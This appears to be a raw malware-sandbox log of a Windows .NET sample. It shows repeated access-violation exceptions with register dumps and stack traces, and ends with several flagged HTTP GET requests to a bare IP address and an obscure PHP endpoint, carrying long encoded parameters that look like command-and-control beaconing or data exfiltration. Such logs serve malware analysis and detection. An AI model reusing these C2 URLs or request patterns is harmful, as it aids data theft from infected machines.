DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 78 04 b9 50 b3 9f 71 e8 fc 99 46 f9 8d 56 0c
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x70a86cb
registers.esp: 104721640
registers.edi: 47188160
registers.eax: 0
registers.ebp: 104721752
registers.edx: 118119717
registers.ebx: 44998324
registers.esi: 47176596
registers.ecx: 5915148
1 0 0

__exception__

stacktrace:
0x68658a4
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d36ad @ 0x718d36ad
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x68607b4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 78 04 b9 50 b3 9f 71 e8 74 94 46 f9 8d 56 10
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x70a8c53
registers.esp: 104721640
registers.edi: 48360040
registers.eax: 0
registers.ebp: 104721752
registers.edx: 118119717
registers.ebx: 44998324
registers.esi: 47493872
registers.ecx: 5915148
1 0 0

__exception__

stacktrace:
0x70a8c4d
0x68658a4
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d36ad @ 0x718d36ad
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x68607b4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 3b 42 04 7f 73 b9 b0 91 0e 01 ba 6d 00 00 00 e8
exception.instruction: cmp eax, dword ptr [edx + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x70a4b3f
registers.esp: 104721516
registers.edi: 46797032
registers.eax: 0
registers.ebp: 104721632
registers.edx: 0
registers.ebx: 44998324
registers.esi: 104721516
registers.ecx: 46402944
1 0 0

__exception__

stacktrace:
0x68658a4
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d36ad @ 0x718d36ad
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x68607b4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 78 04 b9 50 b3 9f 71 e8 74 94 46 f9 8d 56 10
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x70a8c53
registers.esp: 104721640
registers.edi: 46797032
registers.eax: 0
registers.ebp: 104721752
registers.edx: 118115996
registers.ebx: 44998324
registers.esi: 46402984
registers.ecx: 5915148
1 0 0

__exception__

stacktrace:
0x6865b37
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d36ad @ 0x718d36ad
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x68607b4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 78 04 b9 50 b3 9f 71 e8 9c 8e 46 f9 8d 56 0c
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x70a922b
registers.esp: 104721640
registers.edi: 49436664
registers.eax: 0
registers.ebp: 104721752
registers.edx: 118119717
registers.ebx: 44998324
registers.esi: 48664752
registers.ecx: 5915148
1 0 0
suspicious_features Connection to IP address suspicious_request GET http://5.161.143.111/Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?GIG=klKMNcQkIT8mGtQcqqOlPyC8q&2d245906dee96b5ce3f8d76d9471a15c=547633646c10c545015bf1314b4f8eea&9a96373b97fc1a2b0de79e211da21f57=AOwYzNzATOwQWYjlDNmVDMlljZxczYlZGO1kzMhFGNhJ2Y0E2M3UjZ&GIG=klKMNcQkIT8mGtQcqqOlPyC8q
suspicious_features Connection to IP address suspicious_request GET http://5.161.143.111/Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY&6967395b662dd465398b11d85162f0d3=d1nImRWYjhzMkBDMyEzM0YjMyMGZjNjMhBjN5UDNxATO5YTZlhzNmZmYkJiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W
suspicious_features Connection to IP address suspicious_request GET http://5.161.143.111/Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY&989f9bfdbcf48eb9c6ec71e7025d32af=0VfiIiOiIzMwMGNkFDN5IjNjNGNzQTYyYmZjlTN2IWMyEmZxgTOiwiI5IWM3ADN4ITOxYWOmJzN2cTOjdTNzQGNmNzYzkTYlJ2YmNjZkVDZzIiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W
suspicious_features Connection to IP address suspicious_request GET http://5.161.143.111/Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY&6967395b662dd465398b11d85162f0d3=d1nIzMmY5UDOzQmY4cTNxMTZyUmYjVWNmNzMwUTOhhjZzcjN0IzN0ADO4IiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W&989f9bfdbcf48eb9c6ec71e7025d32af=d1nIiojIyMDMjRDZxQTOyYzYjRzM0EmMmZ2Y5UjNiFjMhZWM4kjIsIyMjJWO1gzMkJGO3UTMzUmMlJ2YlVjZzMDM1kTY4Y2M3YDNycDNwgDOiojI5kzMkhzN0MDN4ADOmFDZ2czMhBjYkVmZlBDZ0MDZ4QmIsIyY0gTNyYGM4UWY5MzYiZWM4IGMyY2Y3YDZklDZ5ATZhVWZ5MWZmRTMiojI4E2M3cTNiZGMwQTM1QGOxIGOhdDNiNjY4Q2YlF2NlBjI7xSfiADWmlGOqlkNJNkTpRGValmTXpFeNdlT6lFRNNTUX9EeN1WW0k1RaBTWqpleFpXTspEVOh3Yq5EenpmW0MGRPl2cu9UaFdEZoJVRkRjVtl0cVp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarNUT4FUeaVHbHN2dWdEZUJ0QPFTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1dnpGT5F0QRdWVGVFRCNUT3FFRPRXVUF2ZrNFVVh2UalXOyE1ZrlWVvd3VaBTNXNVavpWSsFzVZ9kVGVFRKNETpt2URZHNFt0ZJhlWwIEWZtmRFlkeOdVYvJEWZlHZFlkQktmVnFVbjhmUtJGaSNTVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50Z0UUSzZUbiZHbyMmeW1mW2pESVd2YElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKNkYxkzVaRVOTlFcOhVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXSTlFbKNjYMJ0QhBjVzIGVCNFTnF1VaBnWXFmaWd0Y6J0QkZXNrlkNJlnW5lTbJNXS55kMjRUT1NmaNh3dT9UMVpmT1NmeNl2bqlka5ckYpdXaJNFdrlkNJNVZ5JlbiFTOykVa3lWSzZ1MixmTslkNJlmY2xmMaxmSul0cJNFZuFTaiZHZzI2TKl2TptGSkBnTtl0cJlWTxUkaMBTTU1UdnRUT5RzUONTRqlkNJN0YwpUelZTS5JWb1c1U3x2aJNXSp1UeRNzYsJlbJZTSTpFdG1GV5ZlMjZlSDxUaNVUV0lkaNVlTWJVVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIzMwMGNkFDN5IjNjNGNzQTYyYmZjlTN2IWMyEmZxgTOiwiI0MWN0AjY1cDMmdDMzYTO2QDZwQ2Y0E2YzcTN4YWY0MGZyYjZ0EjMmJiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W
suspicious_features Connection to IP address suspicious_request GET http://5.161.143.111/Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY&8f099c46b18199a489f2d28eafb098db=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
suspicious_features Connection to IP address suspicious_request GET http://5.161.143.111/Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY&6967395b662dd465398b11d85162f0d3=d1nIiRWNiVGZmBjY3MTM3E2NwEmZmJ2Y5ImNkNDM1U2NzgTN1M2M1UTYxIiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W
suspicious_features Connection to IP address suspicious_request GET http://5.161.143.111/Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY&989f9bfdbcf48eb9c6ec71e7025d32af=0VfiIiOiIzMwMGNkFDN5IjNjNGNzQTYyYmZjlTN2IWMyEmZxgTOiwiImRWYjhzMkBDMyEzM0YjMyMGZjNjMhBjN5UDNxATO5YTZlhzNmZmYkJiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W
suspicious_features Connection to IP address suspicious_request GET http://5.161.143.111/Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY&8f099c46b18199a489f2d28eafb098db=d1nI0s2TwY1RiNnRyY1Z4cEZ3xmbjRkQ5NGaot2QORzaPBjVHJ2cGJjVnV1ViZnSIFGROpWWsRWMjFjUyIGNWt2QORzaPBjVHJ2cGJjVnFFWaNHeXlFWSNzYxoESWtEMnRlNRhlWzh3VZhlQpJmdsdEZoJ1MVhmSuNGbSx2QORzaPBjVHJ2cGJjVnFFWaNHeXl1MshEZwJ1VhFjRYFWTwFFRPBHRkxGeHJGakZUSoJVbjhmVzI1SwcGV2EFWaNHeXlFWCNEZsh3RihGZxIGMChVZ550aiBXOykFMs1WU3Z1